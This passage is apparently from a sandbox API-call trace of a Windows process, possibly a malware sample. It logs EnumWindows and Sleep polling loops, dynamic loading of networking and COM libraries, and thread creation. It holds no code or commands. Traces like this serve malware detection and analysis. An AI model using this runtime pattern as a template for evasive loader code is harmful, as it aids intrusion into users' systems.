(dwMilliseconds=0x64) [0291.845] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0291.846] Sleep (dwMilliseconds=0x64) [0291.890] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0291.892] Sleep (dwMilliseconds=0x64) [0291.986] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0291.987] Sleep (dwMilliseconds=0x64) [0292.075] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0292.080] Sleep (dwMilliseconds=0x64) [0292.153] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0292.154] Sleep (dwMilliseconds=0x64) [0292.207] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0292.209] Sleep (dwMilliseconds=0x64) [0292.231] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0292.232] Sleep (dwMilliseconds=0x64) [0292.324] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0292.326] Sleep (dwMilliseconds=0x64) [0292.468] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0292.468] Sleep (dwMilliseconds=0x64) [0292.559] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0292.560] Sleep (dwMilliseconds=0x64) [0292.657] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0292.658] Sleep (dwMilliseconds=0x64) [0292.668] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0292.669] Sleep (dwMilliseconds=0x64) [0292.717] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0292.718] Sleep (dwMilliseconds=0x64) [0292.736] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0292.737] Sleep (dwMilliseconds=0x64) [0292.747] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0292.748] Sleep (dwMilliseconds=0x64) [0292.825] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0292.827] Sleep (dwMilliseconds=0x64) [0292.926] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0292.927] Sleep (dwMilliseconds=0x64) [0292.967] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0292.968] Sleep (dwMilliseconds=0x64) [0293.014] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0293.015] Sleep (dwMilliseconds=0x64) [0293.106] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0293.107] Sleep (dwMilliseconds=0x64) [0293.147] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0293.148] Sleep (dwMilliseconds=0x64) [0293.169] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0293.170] Sleep (dwMilliseconds=0x64) [0293.218] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0293.218] Sleep (dwMilliseconds=0x64) [0293.278] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0293.280] Sleep (dwMilliseconds=0x64) [0293.372] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0293.372] Sleep (dwMilliseconds=0x64) [0293.451] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0293.453] Sleep (dwMilliseconds=0x64) [0293.531] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0293.532] Sleep (dwMilliseconds=0x64) [0293.568] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0293.569] Sleep (dwMilliseconds=0x64) [0293.624] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0293.625] Sleep (dwMilliseconds=0x64) [0293.642] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0293.642] Sleep (dwMilliseconds=0x64) [0293.656] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0293.656] Sleep (dwMilliseconds=0x64) [0293.734] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0293.736] Sleep (dwMilliseconds=0x64) [0293.815] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0293.817] Sleep (dwMilliseconds=0x64) [0293.903] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0293.905] Sleep (dwMilliseconds=0x64) [0293.956] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0293.957] Sleep (dwMilliseconds=0x64) [0294.047] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0294.048] Sleep (dwMilliseconds=0x64) [0294.172] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0294.173] Sleep (dwMilliseconds=0x64) [0294.234] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0294.235] Sleep (dwMilliseconds=0x64) [0294.271] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0294.271] Sleep (dwMilliseconds=0x64) [0294.315] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0294.316] Sleep (dwMilliseconds=0x64) [0294.332] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0294.332] Sleep (dwMilliseconds=0x64) [0294.403] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0294.406] Sleep (dwMilliseconds=0x64) [0294.439] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0294.440] Sleep (dwMilliseconds=0x64) [0294.519] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0294.520] Sleep (dwMilliseconds=0x64) [0294.531] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0294.532] Sleep (dwMilliseconds=0x64) [0294.546] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0294.548] Sleep (dwMilliseconds=0x64) [0294.595] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0294.596] Sleep (dwMilliseconds=0x64) [0294.636] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0294.637] Sleep (dwMilliseconds=0x64) [0294.782] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0294.783] Sleep (dwMilliseconds=0x64) [0294.823] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0294.824] Sleep (dwMilliseconds=0x64) [0294.892] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0294.893] Sleep (dwMilliseconds=0x64) [0294.981] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0294.986] Sleep (dwMilliseconds=0x64) [0295.050] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0295.050] Sleep (dwMilliseconds=0x64) [0295.109] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0295.110] Sleep (dwMilliseconds=0x64) [0295.268] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0295.269] Sleep (dwMilliseconds=0x64) [0295.323] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0295.327] Sleep (dwMilliseconds=0x64) [0295.423] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0295.423] Sleep (dwMilliseconds=0x64) [0295.469] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0295.470] Sleep (dwMilliseconds=0x64) [0295.517] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0295.517] Sleep (dwMilliseconds=0x64) [0295.656] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0295.657] Sleep (dwMilliseconds=0x64) [0295.733] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0295.733] Sleep (dwMilliseconds=0x64) [0295.794] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0295.796] Sleep (dwMilliseconds=0x64) [0295.889] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0295.890] Sleep (dwMilliseconds=0x64) Thread: id = 51 os_tid = 0xd18 Thread: id = 52 os_tid = 0xd20 Thread: id = 165 os_tid = 0xd3c Thread: id = 166 os_tid = 0xae4 Thread: id = 167 os_tid = 0xd44 Thread: id = 168 os_tid = 0xd40 Thread: id = 169 os_tid = 0xb24 Thread: id = 171 os_tid = 0x1104 [0232.495] LoadLibraryA (lpLibFileName="NTDLL") returned 0x7ffa16770000 [0232.497] GetProcAddress (hModule=0x7ffa16770000, lpProcName="RtlExitUserThread") returned 0x7ffa167cc2a0 [0232.499] RtlCreateHeap (Flags=0x1002, HeapBase=0x0, ReserveSize=0x0, CommitSize=0x0, Lock=0x0, Parameters=0x0) returned 0x8780000 [0232.501] RtlAllocateHeap (HeapHandle=0x8780000, Flags=0x8, Size=0x10) returned 0x8780830 [0232.501] LoadLibraryA (lpLibFileName="user32") returned 0x7ffa13d80000 [0232.501] RtlSizeHeap (HeapHandle=0x8780000, Flags=0x0, MemoryPointer=0x8780830) returned 0x10 [0232.513] RtlFreeHeap (HeapHandle=0x8780000, Flags=0x0, BaseAddress=0x8780830) returned 1 [0232.568] RtlAllocateHeap (HeapHandle=0x8780000, Flags=0x8, Size=0x12) returned 0x8780830 [0232.568] LoadLibraryA (lpLibFileName="advapi32") returned 0x7ffa15090000 [0232.569] RtlSizeHeap (HeapHandle=0x8780000, Flags=0x0, MemoryPointer=0x8780830) returned 0x12 [0232.569] RtlFreeHeap (HeapHandle=0x8780000, Flags=0x0, BaseAddress=0x8780830) returned 1 [0232.569] RtlAllocateHeap (HeapHandle=0x8780000, Flags=0x8, Size=0x10) returned 0x8780830 [0232.569] LoadLibraryA (lpLibFileName="urlmon") returned 0x7ffa09580000 [0232.570] RtlSizeHeap (HeapHandle=0x8780000, Flags=0x0, MemoryPointer=0x8780830) returned 0x10 [0232.570] RtlFreeHeap (HeapHandle=0x8780000, Flags=0x0, BaseAddress=0x8780830) returned 1 [0232.570] RtlAllocateHeap (HeapHandle=0x8780000, Flags=0x8, Size=0xf) returned 0x8780830 [0232.570] LoadLibraryA (lpLibFileName="ole32") returned 0x7ffa13b70000 [0232.570] RtlSizeHeap (HeapHandle=0x8780000, Flags=0x0, MemoryPointer=0x8780830) returned 0xf [0232.571] RtlFreeHeap (HeapHandle=0x8780000, Flags=0x0, BaseAddress=0x8780830) returned 1 [0232.571] RtlAllocateHeap (HeapHandle=0x8780000, Flags=0x8, Size=0x11) returned 0x8780830 [0232.571] LoadLibraryA (lpLibFileName="winhttp") returned 0x7ffa0ed60000 [0232.571] RtlSizeHeap (HeapHandle=0x8780000, Flags=0x0, MemoryPointer=0x8780830) returned 0x11 [0232.571] RtlFreeHeap (HeapHandle=0x8780000, Flags=0x0, BaseAddress=0x8780830) returned 1 [0232.571] RtlAllocateHeap (HeapHandle=0x8780000, Flags=0x8, Size=0x10) returned 0x8780830 [0232.571] LoadLibraryA (lpLibFileName="ws2_32") returned 0x7ffa146e0000 [0232.577] RtlSizeHeap (HeapHandle=0x8780000, Flags=0x0, MemoryPointer=0x8780830) returned 0x10 [0232.577] RtlFreeHeap (HeapHandle=0x8780000, Flags=0x0, BaseAddress=0x8780830) returned 1 [0232.577] RtlAllocateHeap (HeapHandle=0x8780000, Flags=0x8, Size=0x10) returned 0x8780830 [0232.577] LoadLibraryA (lpLibFileName="dnsapi") returned 0x7ffa11800000 [0232.578] RtlSizeHeap (HeapHandle=0x8780000, Flags=0x0, MemoryPointer=0x8780830) returned 0x10 [0232.578] RtlFreeHeap (HeapHandle=0x8780000, Flags=0x0, BaseAddress=0x8780830) returned 1 [0232.578] RtlAllocateHeap (HeapHandle=0x8780000, Flags=0x8, Size=0x11) returned 0x8780830 [0232.578] LoadLibraryA (lpLibFileName="shell32") returned 0x7ffa15210000 [0232.578] RtlSizeHeap (HeapHandle=0x8780000, Flags=0x0, MemoryPointer=0x8780830) returned 0x11 [0232.578] RtlFreeHeap (HeapHandle=0x8780000, Flags=0x0, BaseAddress=0x8780830) returned 1 [0232.579] LoadLibraryA (lpLibFileName="api-ms-win-core-com-l1-1-0") returned 0x7ffa14340000 [0232.580] GetProcAddress (hModule=0x7ffa14340000, lpProcName="CoInitializeEx") returned 0x7ffa143a2c50 [0232.580] LoadLibraryA (lpLibFileName="api-ms-win-core-com-l1-1-0") returned 0x7ffa14340000 [0232.581] GetProcAddress (hModule=0x7ffa14340000, lpProcName="CoInitializeSecurity") returned 0x7ffa14375fe0 [0232.581] LoadLibraryA (lpLibFileName="api-ms-win-core-com-l1-1-0") returned 0x7ffa14340000 [0232.582] GetProcAddress (hModule=0x7ffa14340000, lpProcName="CoCreateInstance") returned 0x7ffa143dfb70 [0232.582] LoadLibraryA (lpLibFileName="api-ms-win-core-com-l1-1-0") returned 0x7ffa14340000 [0232.583] GetProcAddress (hModule=0x7ffa14340000, lpProcName="CoUninitialize") returned 0x7ffa143a1540 [0232.584] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x2463ca4, lpParameter=0x2360000, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2144 [0232.587] CloseHandle (hObject=0x2144) returned 1 [0232.587] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x2463d80, lpParameter=0x2360000, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2144 [0232.587] CloseHandle (hObject=0x2144) returned 1 [0232.587] Sleep (dwMilliseconds=0xa) [0232.706] Sleep (dwMilliseconds=0xa) [0232.830] Sleep (dwMilliseconds=0xa) [0232.937] Sleep (dwMilliseconds=0xa) [0232.999] Sleep (dwMilliseconds=0xa) [0233.077] Sleep (dwMilliseconds=0xa) [0233.146] Sleep (dwMilliseconds=0xa) [0233.170] Sleep (dwMilliseconds=0xa) [0233.249] Sleep (dwMilliseconds=0xa) [0233.284] Sleep (dwMilliseconds=0xa) [0233.449] Sleep (dwMilliseconds=0xa) [0233.653] Sleep (dwMilliseconds=0xa) [0233.903] Sleep (dwMilliseconds=0xa) [0234.119] Sleep (dwMilliseconds=0xa) [0234.319] Sleep (dwMilliseconds=0xa) [0234.545] Sleep (dwMilliseconds=0xa) [0234.672] Sleep (dwMilliseconds=0xa) [0234.816] Sleep (dwMilliseconds=0xa) [0234.927] Sleep (dwMilliseconds=0xa) [0235.017] Sleep (dwMilliseconds=0xa) [0235.119] Sleep (dwMilliseconds=0xa) [0235.163] Sleep (dwMilliseconds=0xa) [0235.201] Sleep (dwMilliseconds=0xa) [0235.279] Sleep (dwMilliseconds=0xa) [0235.338] Sleep (dwMilliseconds=0xa) [0235.405] Sleep (dwMilliseconds=0xa) [0235.484] Sleep (dwMilliseconds=0xa) [0235.538] Sleep (dwMilliseconds=0xa) [0235.583] Sleep (dwMilliseconds=0xa) [0235.614] Sleep (dwMilliseconds=0xa) [0235.638] Sleep (dwMilliseconds=0xa) [0235.684] Sleep (dwMilliseconds=0xa) [0235.840] Sleep (dwMilliseconds=0xa) [0235.953] Sleep (dwMilliseconds=0xa) [0236.046] Sleep (dwMilliseconds=0xa) [0236.190] Sleep (dwMilliseconds=0xa) [0236.387] Sleep (dwMilliseconds=0xa) [0236.451] Sleep (dwMilliseconds=0xa) [0236.465] Sleep (dwMilliseconds=0xa) [0236.527] Sleep (dwMilliseconds=0xa) [0236.622] Sleep (dwMilliseconds=0xa) [0236.684] Sleep (dwMilliseconds=0xa) [0236.759] Sleep (dwMilliseconds=0xa) [0236.796] Sleep (dwMilliseconds=0xa) [0236.809] Sleep (dwMilliseconds=0xa) [0236.842] Sleep (dwMilliseconds=0xa) [0237.052] Sleep (dwMilliseconds=0xa) [0237.172] Sleep (dwMilliseconds=0xa) [0237.262] Sleep (dwMilliseconds=0xa) [0237.383] Sleep (dwMilliseconds=0xa) [0237.434] Sleep (dwMilliseconds=0xa) [0237.500] Sleep (dwMilliseconds=0xa) [0237.554] Sleep (dwMilliseconds=0xa) [0237.611] Sleep (dwMilliseconds=0xa) [0237.714] Sleep (dwMilliseconds=0xa) [0237.793] Sleep (dwMilliseconds=0xa) [0237.891] Sleep (dwMilliseconds=0xa) [0237.997] Sleep (dwMilliseconds=0xa) [0238.014] Sleep (dwMilliseconds=0xa) [0238.028] Sleep (dwMilliseconds=0xa) [0238.077] Sleep (dwMilliseconds=0xa) [0238.214] Sleep (dwMilliseconds=0xa) [0238.301] Sleep (dwMilliseconds=0xa) [0238.422] Sleep (dwMilliseconds=0xa) [0238.476] Sleep (dwMilliseconds=0xa) [0238.577] Sleep (dwMilliseconds=0xa) [0238.671] Sleep (dwMilliseconds=0xa) [0238.684] Sleep (dwMilliseconds=0xa) [0238.720] Sleep (dwMilliseconds=0xa) [0238.807] Sleep (dwMilliseconds=0xa) [0238.927] Sleep (dwMilliseconds=0xa) [0239.032] Sleep (dwMilliseconds=0xa) [0239.083] Sleep (dwMilliseconds=0xa) [0239.171] Sleep (dwMilliseconds=0xa) [0239.219] Sleep (dwMilliseconds=0xa) [0239.235] Sleep (dwMilliseconds=0xa) [0239.348] Sleep (dwMilliseconds=0xa) [0239.470] Sleep (dwMilliseconds=0xa) [0239.559] Sleep (dwMilliseconds=0xa) [0239.637] Sleep (dwMilliseconds=0xa) [0239.700] Sleep (dwMilliseconds=0xa) [0239.761] Sleep (dwMilliseconds=0xa) [0239.819] Sleep (dwMilliseconds=0xa) [0239.876] Sleep (dwMilliseconds=0xa) [0239.923] Sleep (dwMilliseconds=0xa) [0239.965] Sleep (dwMilliseconds=0xa) [0240.069] Sleep (dwMilliseconds=0xa) [0240.184] Sleep (dwMilliseconds=0xa) [0240.278] Sleep (dwMilliseconds=0xa) [0240.348] Sleep (dwMilliseconds=0xa) [0240.464] Sleep (dwMilliseconds=0xa) [0240.602] Sleep (dwMilliseconds=0xa) [0240.688] Sleep (dwMilliseconds=0xa) [0240.781] Sleep (dwMilliseconds=0xa) [0240.840] Sleep (dwMilliseconds=0xa) [0240.918] Sleep (dwMilliseconds=0xa) [0240.983] Sleep (dwMilliseconds=0xa) [0241.002] Sleep (dwMilliseconds=0xa) [0241.090] Sleep (dwMilliseconds=0xa) [0241.186] Sleep (dwMilliseconds=0xa) [0241.250] Sleep (dwMilliseconds=0xa) [0241.345] Sleep (dwMilliseconds=0xa) [0241.481] Sleep (dwMilliseconds=0xa) [0241.518] Sleep (dwMilliseconds=0xa) [0241.565] Sleep (dwMilliseconds=0xa) [0241.618] Sleep (dwMilliseconds=0xa) [0241.829] Sleep (dwMilliseconds=0xa) [0241.921] Sleep (dwMilliseconds=0xa) [0241.976] Sleep (dwMilliseconds=0xa) [0242.105] Sleep (dwMilliseconds=0xa) [0242.282] Sleep (dwMilliseconds=0xa) [0242.341] Sleep (dwMilliseconds=0xa) [0242.375] Sleep (dwMilliseconds=0xa) [0242.458] Sleep (dwMilliseconds=0xa) [0242.517] Sleep (dwMilliseconds=0xa) [0242.625] Sleep (dwMilliseconds=0xa) [0242.715] Sleep (dwMilliseconds=0xa) [0242.778] Sleep (dwMilliseconds=0xa) [0242.956] Sleep (dwMilliseconds=0xa) [0243.004] Sleep (dwMilliseconds=0xa) [0243.064] Sleep (dwMilliseconds=0xa) [0243.183] Sleep (dwMilliseconds=0xa) [0243.280] Sleep (dwMilliseconds=0xa) [0243.374] Sleep (dwMilliseconds=0xa) [0243.427] Sleep (dwMilliseconds=0xa) [0243.547] Sleep (dwMilliseconds=0xa) [0243.678] Sleep (dwMilliseconds=0xa) [0243.780] Sleep (dwMilliseconds=0xa) [0243.894] Sleep (dwMilliseconds=0xa) [0243.964] Sleep (dwMilliseconds=0xa) [0244.064] Sleep (dwMilliseconds=0xa) [0244.184] Sleep (dwMilliseconds=0xa) [0244.210] Sleep (dwMilliseconds=0xa) [0244.251] Sleep (dwMilliseconds=0xa) [0244.295] Sleep (dwMilliseconds=0xa) [0244.359] Sleep (dwMilliseconds=0xa) [0244.468] Sleep (dwMilliseconds=0xa) [0244.578] Sleep (dwMilliseconds=0xa) [0244.671] Sleep (dwMilliseconds=0xa) [0244.763] Sleep (dwMilliseconds=0xa) [0244.782] Sleep (dwMilliseconds=0xa) [0244.827] Sleep (dwMilliseconds=0xa) [0244.845] Sleep (dwMilliseconds=0xa) [0244.858] Sleep (dwMilliseconds=0xa) [0244.889] Sleep (dwMilliseconds=0xa) [0245.016] Sleep (dwMilliseconds=0xa) [0245.067] Sleep (dwMilliseconds=0xa) [0245.174] Sleep (dwMilliseconds=0xa) [0245.309] Sleep (dwMilliseconds=0xa) [0245.344] Sleep (dwMilliseconds=0xa) [0245.435] Sleep (dwMilliseconds=0xa) [0245.498] Sleep (dwMilliseconds=0xa) [0245.622] Sleep (dwMilliseconds=0xa) [0245.697] Sleep (dwMilliseconds=0xa) [0245.798] Sleep (dwMilliseconds=0xa) [0245.887] Sleep (dwMilliseconds=0xa) [0245.972] Sleep (dwMilliseconds=0xa) [0246.077] Sleep (dwMilliseconds=0xa) [0246.173] Sleep (dwMilliseconds=0xa) [0246.195] Sleep (dwMilliseconds=0xa) [0246.233] Sleep (dwMilliseconds=0xa) [0246.328] Sleep (dwMilliseconds=0xa) [0246.408] Sleep (dwMilliseconds=0xa) [0246.516] Sleep (dwMilliseconds=0xa) [0246.655] Sleep (dwMilliseconds=0xa) [0246.707] Sleep (dwMilliseconds=0xa) [0246.753] Sleep (dwMilliseconds=0xa) [0246.800] Sleep (dwMilliseconds=0xa) [0246.859] Sleep (dwMilliseconds=0xa) [0246.953] Sleep (dwMilliseconds=0xa) [0247.027] Sleep (dwMilliseconds=0xa) [0247.137] Sleep (dwMilliseconds=0xa) [0247.231] Sleep (dwMilliseconds=0xa) [0247.284] Sleep (dwMilliseconds=0xa) [0247.344] Sleep (dwMilliseconds=0xa) [0247.382] Sleep (dwMilliseconds=0xa) [0247.454] Sleep (dwMilliseconds=0xa) [0247.719] Sleep (dwMilliseconds=0xa) [0248.014] Sleep (dwMilliseconds=0xa) [0248.117] Sleep (dwMilliseconds=0xa) [0248.233] Sleep (dwMilliseconds=0xa) [0248.326] Sleep (dwMilliseconds=0xa) [0248.429] Sleep (dwMilliseconds=0xa) [0248.574] Sleep (dwMilliseconds=0xa) [0248.747] Sleep (dwMilliseconds=0xa) [0248.964] Sleep (dwMilliseconds=0xa) [0249.106] Sleep (dwMilliseconds=0xa) [0249.234] Sleep (dwMilliseconds=0xa) [0249.324] Sleep (dwMilliseconds=0xa) [0249.406] Sleep (dwMilliseconds=0xa) [0249.425] Sleep (dwMilliseconds=0xa) [0249.471] Sleep (dwMilliseconds=0xa) [0249.530] Sleep (dwMilliseconds=0xa) [0249.594] Sleep (dwMilliseconds=0xa) [0249.719] Sleep (dwMilliseconds=0xa) [0249.811] Sleep (dwMilliseconds=0xa) [0249.878] Sleep (dwMilliseconds=0xa) [0250.048] Sleep (dwMilliseconds=0xa) [0250.174] Sleep (dwMilliseconds=0xa) [0250.224] Sleep (dwMilliseconds=0xa) [0250.270] Sleep (dwMilliseconds=0xa) [0250.370] Sleep (dwMilliseconds=0xa) [0250.462] Sleep (dwMilliseconds=0xa) [0250.552] Sleep (dwMilliseconds=0xa) [0250.607] Sleep (dwMilliseconds=0xa) [0250.705] Sleep (dwMilliseconds=0xa) [0250.752] Sleep (dwMilliseconds=0xa) [0250.796] Sleep (dwMilliseconds=0xa) [0250.829] Sleep (dwMilliseconds=0xa) [0250.889] Sleep (dwMilliseconds=0xa) [0250.909] Sleep (dwMilliseconds=0xa) [0250.954] Sleep (dwMilliseconds=0xa) [0251.031] Sleep (dwMilliseconds=0xa) [0251.089] Sleep (dwMilliseconds=0xa) [0251.214] Sleep (dwMilliseconds=0xa) [0251.273] Sleep (dwMilliseconds=0xa) [0251.373] Sleep (dwMilliseconds=0xa) [0251.417] Sleep (dwMilliseconds=0xa) [0251.473] Sleep (dwMilliseconds=0xa) [0251.544] Sleep (dwMilliseconds=0xa) [0251.591] Sleep (dwMilliseconds=0xa) [0251.668] Sleep (dwMilliseconds=0xa) [0251.765] Sleep (dwMilliseconds=0xa) [0251.872] Sleep (dwMilliseconds=0xa) [0251.951] Sleep (dwMilliseconds=0xa) [0252.018] Sleep (dwMilliseconds=0xa) [0252.127] Sleep (dwMilliseconds=0xa) [0252.216] Sleep (dwMilliseconds=0xa) [0252.269] Sleep (dwMilliseconds=0xa) [0252.330] Sleep (dwMilliseconds=0xa) [0252.406] Sleep (dwMilliseconds=0xa) [0252.497] Sleep (dwMilliseconds=0xa) [0252.578] Sleep (dwMilliseconds=0xa) [0252.626] Sleep (dwMilliseconds=0xa) [0252.731] Sleep (dwMilliseconds=0xa) [0252.828] Sleep (dwMilliseconds=0xa) [0252.868] Sleep (dwMilliseconds=0xa) [0252.910] Sleep (dwMilliseconds=0xa) [0253.010] Sleep (dwMilliseconds=0xa) [0253.114] Sleep (dwMilliseconds=0xa) [0253.307] Sleep (dwMilliseconds=0xa) [0253.432] Sleep (dwMilliseconds=0xa) [0253.703] Sleep (dwMilliseconds=0xa) [0253.780] Sleep (dwMilliseconds=0xa) [0253.872] Sleep (dwMilliseconds=0xa) [0253.926] Sleep (dwMilliseconds=0xa) [0253.982] Sleep (dwMilliseconds=0xa) [0254.015] Sleep (dwMilliseconds=0xa) [0254.028] Sleep (dwMilliseconds=0xa) [0254.044] Sleep (dwMilliseconds=0xa) [0254.091] Sleep (dwMilliseconds=0xa) [0254.161] Sleep (dwMilliseconds=0xa) [0254.249] Sleep (dwMilliseconds=0xa) [0254.342] Sleep (dwMilliseconds=0xa) [0254.409] Sleep (dwMilliseconds=0xa) [0254.481] Sleep (dwMilliseconds=0xa) [0254.562] Sleep (dwMilliseconds=0xa) [0254.583] Sleep (dwMilliseconds=0xa) [0254.624] Sleep (dwMilliseconds=0xa) [0254.781] Sleep (dwMilliseconds=0xa) [0254.839] Sleep (dwMilliseconds=0xa) [0254.944] Sleep (dwMilliseconds=0xa) [0255.047] Sleep (dwMilliseconds=0xa) [0255.093] Sleep (dwMilliseconds=0xa) [0255.115] Sleep (dwMilliseconds=0xa) [0255.193] Sleep (dwMilliseconds=0xa) [0255.294] Sleep (dwMilliseconds=0xa) [0255.388] Sleep (dwMilliseconds=0xa) [0255.465] Sleep (dwMilliseconds=0xa) [0255.530] Sleep (dwMilliseconds=0xa) [0255.589] Sleep (dwMilliseconds=0xa) [0255.614] Sleep (dwMilliseconds=0xa) [0255.687] Sleep (dwMilliseconds=0xa) [0255.737] Sleep (dwMilliseconds=0xa) [0255.799] Sleep (dwMilliseconds=0xa) [0255.875] Sleep (dwMilliseconds=0xa) [0256.079] Sleep (dwMilliseconds=0xa) [0256.298] Sleep (dwMilliseconds=0xa) [0256.377] Sleep (dwMilliseconds=0xa) [0256.450] Sleep (dwMilliseconds=0xa) [0256.726] Sleep (dwMilliseconds=0xa) [0256.863] Sleep (dwMilliseconds=0xa) [0257.043] Sleep (dwMilliseconds=0xa) [0257.188] Sleep (dwMilliseconds=0xa) [0257.312] Sleep (dwMilliseconds=0xa) [0257.395] Sleep (dwMilliseconds=0xa) [0257.468] Sleep (dwMilliseconds=0xa) [0257.737] Sleep (dwMilliseconds=0xa) [0257.894] Sleep (dwMilliseconds=0xa) [0257.952] Sleep (dwMilliseconds=0xa) [0257.995] Sleep (dwMilliseconds=0xa) [0258.034] Sleep (dwMilliseconds=0xa) [0258.109] Sleep (dwMilliseconds=0xa) [0258.152] Sleep (dwMilliseconds=0xa) [0258.204] Sleep (dwMilliseconds=0xa) [0258.343] Sleep (dwMilliseconds=0xa) [0258.389] Sleep (dwMilliseconds=0xa) [0258.434] Sleep (dwMilliseconds=0xa) [0258.495] Sleep (dwMilliseconds=0xa) [0258.580] Sleep (dwMilliseconds=0xa) [0258.626] Sleep (dwMilliseconds=0xa) [0258.700] Sleep (dwMilliseconds=0xa) [0258.748] Sleep (dwMilliseconds=0xa) [0258.828] Sleep (dwMilliseconds=0xa) [0258.854] Sleep (dwMilliseconds=0xa) [0258.937] Sleep (dwMilliseconds=0xa) [0259.006] Sleep (dwMilliseconds=0xa) [0259.130] Sleep (dwMilliseconds=0xa) [0259.222] Sleep (dwMilliseconds=0xa) [0259.306] Sleep (dwMilliseconds=0xa) [0259.358] Sleep (dwMilliseconds=0xa) [0259.419] Sleep (dwMilliseconds=0xa) [0259.437] Sleep (dwMilliseconds=0xa) [0259.589] Sleep (dwMilliseconds=0xa) [0259.668] Sleep (dwMilliseconds=0xa) [0259.726] Sleep (dwMilliseconds=0xa) [0259.849] Sleep (dwMilliseconds=0xa) [0259.947] Sleep (dwMilliseconds=0xa) [0260.032] Sleep (dwMilliseconds=0xa) [0260.099] Sleep (dwMilliseconds=0xa) [0260.158] Sleep (dwMilliseconds=0xa) [0260.233] Sleep (dwMilliseconds=0xa) [0260.295] Sleep (dwMilliseconds=0xa) [0260.399] Sleep (dwMilliseconds=0xa) [0260.488] Sleep (dwMilliseconds=0xa) [0260.544] Sleep (dwMilliseconds=0xa) [0260.623] Sleep (dwMilliseconds=0xa) [0260.652] Sleep (dwMilliseconds=0xa) [0260.734] Sleep (dwMilliseconds=0xa) [0260.897] Sleep (dwMilliseconds=0xa) [0260.959] Sleep (dwMilliseconds=0xa) [0261.012] Sleep (dwMilliseconds=0xa) [0261.106] Sleep (dwMilliseconds=0xa) [0261.188] Sleep (dwMilliseconds=0xa) [0261.250] Sleep (dwMilliseconds=0xa) [0261.304] Sleep (dwMilliseconds=0xa) [0261.347] Sleep (dwMilliseconds=0xa) [0261.435] Sleep (dwMilliseconds=0xa) [0261.514] Sleep (dwMilliseconds=0xa) [0261.607] Sleep (dwMilliseconds=0xa) [0261.684] Sleep (dwMilliseconds=0xa) [0261.763] Sleep (dwMilliseconds=0xa) [0261.824] Sleep (dwMilliseconds=0xa) [0261.938] Sleep (dwMilliseconds=0xa) [0261.981] Sleep (dwMilliseconds=0xa) [0262.060] Sleep (dwMilliseconds=0xa) [0262.146] Sleep (dwMilliseconds=0xa) [0262.232] Sleep 